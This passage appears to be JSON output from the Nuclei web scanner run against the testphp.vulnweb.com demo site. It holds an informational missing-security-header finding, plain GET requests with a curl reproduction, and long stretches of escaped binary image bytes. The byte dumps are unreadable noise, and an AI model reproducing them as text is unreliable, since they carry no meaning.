\\ufffd\\u0010A(\\u003cx\\ufffd\\ufffdP\\ufffdJ\\ufffdUqrd\\ufffd5#6\\ufffd'\\ufffdZ\\r::\\ufffd\\ufffd\\u0010L\\ufffdsN\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdw\\ufffd\\ufffd²z\\ufffdm*\\ufffd4\\ufffd\\u00007\\u0026\\u0016gp5=\\ufffd\\ufffdR\\ufffd\\ufffd*A\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdي\\ufffdՙ\\ufffd*%i@$\\ufffd`i\\ufffdk!\\ufffd!S\\u001a\\ufffd|\\ufffdҥ\\\\\\ufffd\\u000e\\ufffd\\ufffd$\\u0014\\ufffd\\u0002t\\ufffdj\\u00022\\ufffd@m R\\ufffdW\\ufffd1f̤\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0012\\ufffd\\ufffdp\\ufffd\\ufffdJ\\ufffd\\u0008Ե(\\ufffdcz\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdiR\\ufffdPV\\ufffd\\u000c\\ufffdy%m\\ufffd\\ufffd\\ufffd\\u001fqS%\\u00031\\u001e?*T\\ufffd\\u003eE\\u0011\\u00039\\u0011\\ufffd\\u003e\\ufffdj\\ufffd\\t\\ufffd\\u003e\\ufffdR\\ufffdQ\\u0001\\ufffdN\\ufffd\\u0014\\ufffdz\\ufffd@ޕ*Ҹ2ˑ\\ufffd\\u00026\\u001bTKBH:R\\ufffdQ\\ufffd\\u001c[I))\\u0012\\u0007q\\ufffdLI\\u0001\\u000f\\u00109q\\ufffdJ\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffd\\\\P\\u0011=\\ufffd\\ufffdUf\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:35.360149709Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"path\":\"/pictures/5.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"request\":\"GET /pictures/5.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4428\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:12 GMT\\r\\nEtag: \\\"4dca64a1-114c\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0002\\u0003\\u0005\\u0001\\u0007\\u0006\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0004\\u0006\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0012!1AQ\\u0013\\\"\\u00052aq\\u0006\\u0014#B\\ufffd\\ufffd\\ufffd\\ufffdR\\ufffd\\u0015b\\ufffdr\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0000\\u0001\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000/\\u0011\\u0000\\u0001\\u0003\\u0002\\u0005\\u0001\\u0007\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0011\\u0005\\u0012!1A\\u0013Qaq\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0006\\ufffd\\u00142\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u001a\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdV\\u0015\\ufffd\\ufffdgQ\\ufffd%XmƲ \\ufffd\\ufffdTg6\\ufffdru\\ufffdƲ0\\ufffd\\ufffdG\\n\\u003e2y\\ufffd\\ufffdd\\ufffdEV\\u0019m}3\\ufffd1\\ufffd\\ufffd\\u003c*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqY\\u0016`\\ufffd\\ufffdd\\ufffd\\ufffd6\\ufffdk\\\"\\ufffdw\\ufffd\\ufffdr\\ufffd{0\\ufffdqY.\\ufffd\\ufffd\\u0019*\\u003e3\\ufffd\\ufffdF\\u001e\\u0013u\\ufffd\\u000c\\ufffd\\u000f\\u0018\\ufffdDu2i\\ufffd\\ufffdh.\\ufffdH\\ufffd2\\ufffd\\ufffd\\t\\u0019^Ӗ\\ufffd.z*\\ufffdJ\\ufffd\\ufffd\\u001d\\u0014\\u0002\\ufffd@2ء\\u0012\\t\\u0018=\\ufffd+\\u0012T\\u00176.\\ufffd-\\ufffd\\ufffdEcZA\\u0012,\\ufffd*\\ufffd!\\t\\u0003o\\u0007\\ufffd:\\ufffd\\u003c\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\ufffdFh\\ufffdu\\ufffd'\\u000b\\u00086\\u0001\\u0026\\ufffd\\u0003\\ufffd\\ufffd\\u000c4\\r\\ufffd|\\ufffdӼ\\ufffd@\\u0005\\ufffd\\ufffd\\u003e[$LL\\r2Ѡ\\ufffd\\ufffd\\ufffd\\u0000\\u0019ƈ\\ufffd\\ufffd\\ufffdӅ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffd=N\\ufffd\\ufffd2\\u003ct\\ufffdR\\ufffd*Xr\\ufffdr\\ufffd\\u001d8?+\\u000b\\ufffd#2H\\ufffd\\ufffd1\\ufffd\\u0012D\\ufffdሠ\\u0006\\ufffd6\\ufffd9\\u0006\\ufffdo\\ufffd}\\ufffd\\u0001`ֻV\\ufffdV\\u000c\\ufffd\\ufffd\\ufffd./c\\ufffdY\\ufffdp\\ufffd\\ufffd4\\ufffdz\\u000fH\\ufffd\\u0011V\\n\\ufffd\\ufffd\\u001b\\ufffd\\ufffdu\\ufffd\\u0012)X\\u0005\\ufffdn\\ufffd\\ufffd:\\ufffd\\ufffdaU\\u0004\\ufffd\\ufffd\\r?\\ufffd?\\ufffd\\u0008\\ufffd\\rm^\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\r}\\ufffd\\ufffd\\nF\\ufffd\\u0019\\ufffd\\ufffdI\\u0004J\\ufffd\\u0015:\\ufffd\\u0003\\ufffdd\\ufffd?\\ufffd\\ufffdSϬ\\ufffd\\ufffd$!\\ufffdj\\u0004\\ufffd6\\ufffd_\\ufffd_\\u001fk\\ufffd\\r\\u0000\\\\\\ufffd\\ufffdUM4\\ufffd(\\u0008\\u0016\\u0017$\\ufffd\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdx$\\u000e\\u0019\\u0003q\\ufffd#ʚ\\ufffd\\u003e\\ufffd+\\u001a9\\ufffd3\\ufffd;V\\ufffd\\ufffd8\\ufffd\\ufffdc\\ufffd\\ufffdLz\\u0007Ӽ\\ufffd6\\ufffd53\\ufffd\\u0012\\ufffdeZ8\\t4\\u0018\\ufffd\\ufffd\\ufffdJ\\ufffd\\u001c\\u000e\\ufffd\\ufffd4\\ufffd@\\ufffd\\ufffdM\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\u0005EF\\ufffdr9*H\\ufffd(qV\\u000b\\ufffd\\ufffd\\ufffd,\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd%\\ufffd \\ufffd\\u0006\\ufffdB\\ufffdp\\ufffd\\u0004\\ufffd1b\\u0010\\ufffd\\ufffdj9$\\ufffd}?\\ufffd\\ufffd\\ufffd,[M\\ufffd\\ufffd\\ufffd\\u0001\\u001b\\ufffdkQ\\u001dױ\\ufffd`\\ufffd+l\\ufffdiqf\\ufffd\\ufffd\\ufffd\\ufffdWw\\ufffd%+\\u0018\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd$\\ufffdp/8󿡣\\ufffd@\\ufffd\\ufffd\\ufffdr\\ufffdE\\ufffdk\\u001d\\ufffd6\\u003c\\ufffd\\u0008\\ufffd\\ufffdc\\u0006\\ufffdIYX\\ufffd\\ufffd\\ufffd/\\ufffdq\\ufffd\\ufffdR:\\u0018\\ufffd5\\n^%e\\u001eǐ\\ufffd\\u0007\\ufffd\\ufffdU}\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffdR\\ufffd\\ufffd)\\u0000\\u0012H\\ufffd\\ufffd\\u0000\\r\\ufffd\\ufffd\\ufffd\\u003c\\ufffd9\\ufffd\\u0026\\ufffdW\\ufffdI6\\ufffd?a?9\\ufffd\\ufffd\\ufffd!\\ufffduR\\ufffd\\u0000\\ufffd51\\u003e\\ufffd\\u000e\\ufffd\\ufffd\\u001e\\u001dDl-8;ā\\ufffd\\ufffd\\ufffd\\ufffd\\u00006\\u000f?B\\u0000\\u001b\\\\n\\ufffdjꧠ\\ufffd\\ufffdq~c\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\ufffd$SH\\ufffd\\u00132L\\ufffd@\\ufffdW\\ufffd*ё\\ufffdf\\ufffdz\\ufffd\\ufffd\\u0000+\\ufffd\\ufffdm9\\ufffd\\ufffd\\ufffd\\u0014\\ufffdb*\\ufffd\\ufffdV\\ufffdZ4o\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\u001a\\ufffdٷJʭ\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000ex\\ufffd\\ufffd\\u001b\\ufffd(\\ufffd\\ufffd%\\ufffd;+\\ufffd\\ufffdU0\\ufffd\\ufffdXKo\\ufffd\\ufffd\\ufffdhi\\ufffd\\r4~\\ufffd\\ufffd~`\\ufffd\\ufffd(b»\\ufffdz׎\\ufffd\\ufffd\\ufffd\\ufffdh@`\\ufffd\\ufffd\\ufffd6\\ufffdeGݶ\\ufffd\\u0000\\ufffdV\\u0008\\ufffd\\u0005\\ufffdʦ\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd\\r\\ufffd;\\ufffd\\u001d\\t\\ufffd\\u0000@\\ufffd\\ufffds\\ufffdC\\u0014r\\ufffdR3\\u001f\\ufffd\\ufffd2\\t\\u0014i\\ufffd\\ufffd\\ufffdTG\\ufffd:\\u0010\\u0008\\ufffd\\ufffd\\ufffdB\\ufffd'\\ufffd(\\\\e\\ufffdp\\ufffd |\\ufffdR\\ufffd.\\ufffd\\u000b\\ufffd\\ufffd\\ufffdt\\u0005\\ufffd\\ufffd\\u0002C\\ufffd\\ufffd7\\u0016\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\u0007M\\ufffdE$,\\ufffd\\u0026\\u0014\\u000e\\ufffd\\u003c\\ufffd\\u0007\\ufffd\\ufffd\\u001d\\t\\ufffd4\\ufffdJҼ\\ufffd~\\ufffd\\ufffd9jC,d\\ufffdف\\u001c\\u0001\\ufffd;\\ufffd\\u0000]\\ufffd\\u0007kZ߇\\ufffd\\ufffdP\\ufffd\\ufffd\\u0015\\ufffd2\\ufffd(k\\ufffd\\ufffd/\\ufffd\\u0011\\ufffdM\\ufffd\\ufffd\\ufffd:\\ufffdd\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd林ԝ\\ufffdCpX\\ufffd\\ufffd8\\ufffd/\\ufffd\\u0016\\u003c\\ufffd\\u001c\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdkkb\\ufffdu\\u0011G/\\ufffd^O\\ufffdT\\u0014x\\ufffd}Gׯ\\ufffdŠ\\ufffdsJ\\u0015\\ufffde\\n\\ufffdw\\ufffdZW\\u0000\\ufffd\\r\\u001e/\\ufffdW{]{\\u0005\\ufffd\\ufffdUQ22]a}{\\ufffd\\u003e]OK\\ufffd\\ufffdF\\ufffd*D\\u0026\\ufffd7;\\ufffd\\ufffd{\\ufffd\\ufffdQ\\u0010\\ufffd\\ufffd\\ufffdC\\ufffdP\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffdv(\\u0001\\ufffd\\ufffdO8\\ufffdZWi\\ufffd\\ufffd\\u0001i#4֥A\\ufffdш\\ufffd\\ufffdsW]\\ufffd\\ufffd\\u0013$\\ufffd4N\\u001fiV\\ufffdn\\ufffd\\u0006\\u001c\\ufffd\\ufffd\\u0010~\\ufffd\\ufffd9#\\u0001:\\u0015F\\ufffdH\\u0003\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdA%\\ufffd\\ufffdx\\ufffd\\ufffd\\u000fw5\\ufffd\\ufffd\\ufffd\\u0003*\\ufffd\\u0003\\u0016\\ufffdIY\\ufffdHY\\u001byqE@\\ufffd\\ufffd5\\ufffd\\ufffdo\\ufffd۾\\ufffd\\ufffd\\u0012(U_dP\\ufffdV4-)$\\ufffdJ,\\ufffdl\\ufffd\\\"\\ufffd\\ufffdךˌ\\r,pƞ\\ufffds\\ufffd\\ufffd\\ufffd\\u00197B\\ufffd\\ufffd-\\ufffdC\\ufffdm\\ufffd\\ufffd\\u000f\\u0016\\r\\ufffd\\ufffdB\\ufffdf\\ufffd\\u001b\\u0014\\ufffd\\ufffd\\ufffd\\ufffd\\u001fE\\ufffdڄ\\ufffd\\ufffd\\ufffd\\ufffd18\\ufffd\\ufffd\\u001d\\ufffd\\ufffdUoU\\ufffd\\ufffd\\\"\\ufffdоؤӳ0\\u0006\\ufffdp3cT\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd5\\r$6x\\ufffd\\u0010z\\ufffd\\u0026ʶ\\ufffdTh\\u001a#\\ufffdV-\\u0002j\\u0002\\u0015\\u0005\\t\\ufffd\\ufffd\\t\\u0014M_#\\ufffd\\u001b\\u0000\\ufffd\\u0005\\u001e/+\\ufffdóJ\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffd\\ufffd%\\ufffdK\\ufffd\\ufffdR\\ufffdF\\ufffd*\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffdhi\\ufffd%d\\ufffd4\\ufffdEz\\ufffd\\u0015BG\\ufffd\\u0006\\ufffd5`t\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffd\\u0000\\ufffdI\\ufffd\\u000eù\\ufffd9\\u003ce\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdxԊfQVv\\ufffd@\\ufffd]\\ufffd\\ufffdxÂ\\ufffd\\ufffdzI\\ufffd\\ufffdc\\ufffd\\u0005u\\ufffdA#*:\\ufffdB\\u0003Q\\ufffdM\\u0003G\\ufffdDgSB\\ufffd\\ufffd\\ufffdޑ3\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u0001\\ufffdy\\u0000\\u0001\\ufffdt錬\\n\\ufffd$\\ufffd\\ufffd]\\u0001\\u0004\\ufffdˎ\\ufffdx\\ufffd\\t\\ufffd\\ufffdY\\ufffd\\u0002\\ufffd\\ufffd:d\\u001a\\ufffdA\\u0010\\ufffdf\\ufffd\\u001c\\ufffd-\\ufffd{\\ufffd-tv݁\\ufffd\\ufffd\\ufffdV2\\ufffd.W5Y\\ufffd\\u0018\\u000bKέ\\ufffd\\ufffd,yt蓕\\ufffdU\\ufffd\\ufffdfP\\ufffd[\\u0000o\\ufffd]\\u0001aۥu'\\u0011\\u0012)\\ufffd\\ufffd+\\u0017ݹ\\u001c8*\\u0008,\\u0008\\ufffd{w\\u0007\\ufffd\\ufffd\\ufffdI\\ufffd]\\u0013Țy\\ufffd\\u0012eYD\\ufffdC!dV\\u001e\\ufffd\\t5\\ufffdA\\ufffd\\u0002\\ufffd\\ufffd\\u000eT\\ufffdB}k\\ufffd\\ufffd1\\ufffd2\\ufffdK\\u001f\\u0014\\ufffd\\ufffd.k\\\\30\\ufffd\\ufffdF.ڗ\\u0008ݭ\\ufffd}\\ufffdj\\ufffd,o\\ufffd[\\u0013\\u001b\\u001c\\ufffd\\u001a\\ufffd\\u003cQʂ\\ufffdov]\\ufffd`\\ufffdn\\ufffd\\ufffd\\u0012mH\\ufffd\\ufffd^\\ufffd古T\\ufffd|r\\ufffd\\ufffd]\\ufffd\\u0002O\\u0015\\ufffdu'\\ufffd\\u0000\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$\\ufffd\\u00166\\ufffdrgK\\ufffd\\ufffd]\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\n_;\\ufffd\\u0000\\ufffd\\u0000}\\ufffd\\r\\ufffdj\\u0010\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsn\\ufffdN\\ufffd]\\ufffd\\ufffd뷋\\ufffd\\ufffdL\\ufffdL\\ufffdE\\u0014Q\\ufffdWolq\\ufffdv\\u0002\\ufffd/h#ڶ;\\ufffd\\ufffdrT\\u001b\\ufffd\\ufffd\\ufffd\\ufffd1X\\ufffd{I{@\\ufffd\\ufffdd\\ufffd\\ufffdd\\ufffd\\u000fóG\\ufffdD\\ufffdj\\ufffd(Ν\\ufffd\\ufffd\\tm\\u001f1a@\\ufffd\\ufffdr7X\\r^E\\ufffd@\\ufffdt\\ufffd!\\ufffdU\\ufffd+\\u001bI\\ufffd\\ufffdGP\\u0019\\ufffd\\nwn\\ufffd\\ufffd\\u0010\\u000f\\u001b\\ufffdb\\u000fZ 篡\\ufffdӟO\\u003c\\ufffd\\ufffd\\ufffdbd(\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdn\\ufffd\\ufffdo\\u001b\\ufffd\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7z\\u0016#\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdfe^\\u001a\\ufffd\\ufffd\\ufffd.kYrQ\\ufffd4E\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\u001c\\u0002NԠ\\ufffd\\u0010\\ufffd\\ufffd$w\\ufffd\\ufffdO\\ufffd0$\\u0012\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd.\\ufffdlR\\ufffdc\\ufffdH5\\ufffd\\ufffd\\ufffdŬ1\\ufffd\\ufffdY\\n\\ufffd\\u0006\\ufffd\\\\\\u0005\\u0003\\ufffd_\\u003c\\ufffdn\\ufffd՞2\\ufffd\\ufffd'u\\ufffd84s\\ufffdB\\u001a\\ufffd\\ufffdi\\ufffd\\ufffdJ\\u0002\\ufffd*\\ufffdGI1\\ufffda\\u0011\\ufffd6\\ufffdT\\ufffd\\ufffd\\u000b*\\ufffd\\u000bW\\ufffd\\u001f\\ufffd~\\ufffd\\ufffd\\ufffdP`\\ufffd\\ufffdP\\ufffd\\ufffdۻ1w\\ufffd\\ufffdfbI\\ufffd9\\ufffd\\u0000\\ufffd\\ufffdh\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\u0015QI\\u0026\\ufffd\\u0001G=z\\u0000\\u003c\\ufffd\\ufffd\\u0015_\\u0012\\ufffdi\\u0001/c@\\ufffd\\ufffdZS\\ufffdH\\ufffd\\ufffdb\\u0012\\ufffd\\ufffd\\u0018\\ufffdK\\ufffd`R9w,G\\u0000\\u0002\\r_S\\ufffd\\ufffd\\ufffdK\\ufffdַZ\\ufffd\\u0000\\ufffd~!9\\ufffd4\\ufffd\\ufffd5Dc܇jPF\\u001cݐ\\ufffdl}\\ufffd{4\\ufffd\\ufffd\\ufffd锉\\ufffd\\ufffd*fm\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd׻h\\u0015f\\ufffd\\ufffd\\u0019{z!\\ufffd\\ufffd\\u001d8W`_\\ufffd\\ufffd\\ufffd\\u0005\\ufffdW`C\\ufffd\\ufffdo\\ufffd=M\\ufffd\\u000cG\\u000fu`\\u0001\\ufffd\\ufffd\\ufffd\\u0010\\u0019%\\u003c\\ufffd\\ufffdfk\\ufffd\\ufffd\\ufffd\\ufffdI/\\ufffd4_\\u0001\\ufffd/\\ufffdf_\\ufffd,(\\ufffdHǫРM\\ufffd=\\u0005\\ufffd?z\\ufffdmY;\\ufffd\\ufffd\\ufffd\\ufffd\\t\\nzu\\ufffd\\ufffd篃]\\u000em|GYꬔ\\ufffdB\\ufffd%MY\\u0000՟\\u0000\\ufffd\\u0017]\\u003c\\ufffdkkUQ\\u0015\\ufffd\\ufffd\\ufffdV76\\ufffdD\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdp\\ufffdM\\u0010!\\ufffd\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffdJ\\ufffd[\\ufffd;\\u001b\\u0004_RB\\ufffd#\\u0005\\ufffd\\ufffd@\\ufffd\\ufffd \\ufffd=8$_\\ufffdp\\ufffdY\\nV\\ufffd2\\u0016\\ufffd%\\ufffd\\ufffd\\u0007\\ufffd\\ufffdyѨgӘ\\r\\u0018\\ufffd=7W\\ufffd\\ufffd\\u001f\\ufffd\\u0016\\ufffd|\\u001b=1\\ufffd\\ufffdb\\ufffd+\\ufffd\\u003c\\ufffd\\ufffd \\u003cO\\ufffdj\\ufffd\\u0003V玎\\ufffd+~\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd?\\u0010O,_\\ufffd\\ufffd'\\ufffd\\ufffdC\\u001bN\\ufffdb\\ufffd\\u003c\\ufffdn\\n\\u0018\\u0000\\ufffd\\ufffdn\\ufffd\\ufffd\\u0018\\ufffd\\u0015d_\\u0000\\ufffd\\ufffdN\\u0011\\ufffd\\ufffd;\\ufffd\\u000cȼ\\ufffd\\ufffd\\ufffd͑\\ufffd\\ufffd{4\\ufffdtq\\ufffd:HF\\ufffdI57\\\"\\ufffd\\u000c\\ufffd\\u0013a\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd'$\\ufffd\\ufffd\\ufffd\\u0019cy^\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u001e6\\ufffd^E\\ufffd\\u000e_\\ufffd\\ufffd\\ufffd\\ufffdru\\ufffd\\ufffdLa\\ufffd\\ufffd\\u0019\\ufffd6\\ufffd\\r\\u0005t$\\u0017b\\ufffd\\u0016\\ufffdkn9\\ufffdU\\ufffd\\ufffd\\ufffd?\\ufffdU\\ufffdm\\ufffd\\u0015\\ufffd\\ufffdO5|\\ufffdz#\\ufffd\\ufffd;.\\ufffd\\ufffdԚ\\ufffdi*\\ufffd\\ufffd\\ufffdv\\ufffdb\\u0005\\ufffd ]mcԟq\\ufffd\\u0000\\ufffd\\u000c\\ufffdl\\ufffd\\ufffd\\t%E\\ufffd\\u0000\\u001c\\ufffd'?\\ufffd\\ufffdO\\u0007\\ufffd'\\ufffd\\ufffd)\\ufffdњ8\\ufffd\\u000b\\ufffdu\\u0006\\ufffdY\\ufffd\\ufffd\\ufffdnQ\\ufffdߥ\\ufffd9\\ufffd\\ufffd\\u0002\\r\\n\\ufffd\\ufffdW\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdu\\ufffdqFY\\ufffd)U\\ufffdn\\ufffd\\ufffd\\u0002\\ufffd\\ufffdӽ\\u000b$\\ufffd,~f#(t\\ufffd\\ufffd87\\ufffd\\ufffd\\ufffdG\\u003e*\\ufffd}z\\ufffd\\ufffd/{\\ufffd@5S\\ufffd\\ufffdz\\u0016\\ufffd\\n\\ufffd!f\\ufffdH\\ufffd\\u0019\\u0002m\\u000c\\ufffd6\\ufffd\\ufffdn\\ufffd\\u001b`\\u0005\\ufffdNVȻ\\u0013\\ufffd9\\u0004\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd7W\\ufffd\\u0000,\\ufffd,\\ufffd\\ufffd_zG\\u000cP@\\ufffd!\\ufffd\\u0004h\\ufffd\\ufffd\\n\\u0005\\u0001}\\ufffd;\\ufffdp\\ufffd,\\ufffd\\ufffdd\\ufffd\\ufffdZ\\ufffdO\\u0003\\ufffdj\\u003c\\ufffdt\\ufffd\\u0008\\ufffd\\u0000A2\\u001a\\ufffd\\u0013|u\\ufffd+\\ufffd\\ufffd*\\ufffdS\\ufffdԐ\\u0011\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffd?A\\ufffdV2\\t\\ufffd,\\ufffd\\u0015\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdA\\ufffdZy\\ufffd\\ufffd\\ufffd\\ufffdd'k*\\ufffd-\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\u0016E\\ufffdS\\u0011C\\u000b\\ufffd%\\ufffd\\ufffd\\ufffd_\\ufffd}\\ufffd50j\\u0016#\\ufffdi\\ufffdƀ\\ufffd\\ufffd\\ufffdW\\ufffdU\\ufffd\\ufffdj\\ufffdy\\ufffd1\\u000b\\u0006\\ufffd\\ufffd\\u0013\\ufffd\\ufffd$\\ufffd\\ufffd2Q\\ufffduA\\ufffd\\ufffdP\\ufffd\\ufffdI\\ufffd2\\u0000i=\\ufffd\\u001b\\ufffd\\ufffd\\rq\\ufffdh\\ufffdP+\\ufffd\\t\\ufffd\\ufffd$\\ufffd\\ufffd\\r$\\ufffd\\ufffd\\ufffdx\\ufffd`\\ufffd\\ufffd\\u0001\\u0007\\ufffd\\u0004U\\ufffd\\ufffd\\ufffd\\ufffdp\\u0004E\\ufffdԄt8\\ufffdDl!\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd%\\ufffdj\\u0026\\ufffd\\u001eÓҸ\\u001c\\ufffd\\u0005\\ufffd\\ufffduh\\ufffdeT\\u0008y\\ufffd\\ufffdہ\\u0016v\\ufffd\\ufffd]\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffdk\\ufffd^\\ufffd\\ufffd/#6\\ufffd\\ufffd\\ufffd\\ufff